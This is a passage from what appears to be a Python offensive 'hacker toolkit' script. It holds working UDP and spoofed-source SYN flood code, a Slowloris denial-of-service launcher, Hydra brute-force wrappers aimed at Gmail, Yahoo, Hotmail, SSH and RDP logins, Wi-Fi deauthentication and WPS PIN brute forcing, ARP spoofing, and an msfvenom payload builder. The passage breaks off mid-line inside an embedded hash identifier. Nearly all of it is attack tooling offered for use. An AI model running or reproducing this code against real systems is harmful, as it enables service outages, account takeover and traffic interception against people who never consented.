gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and 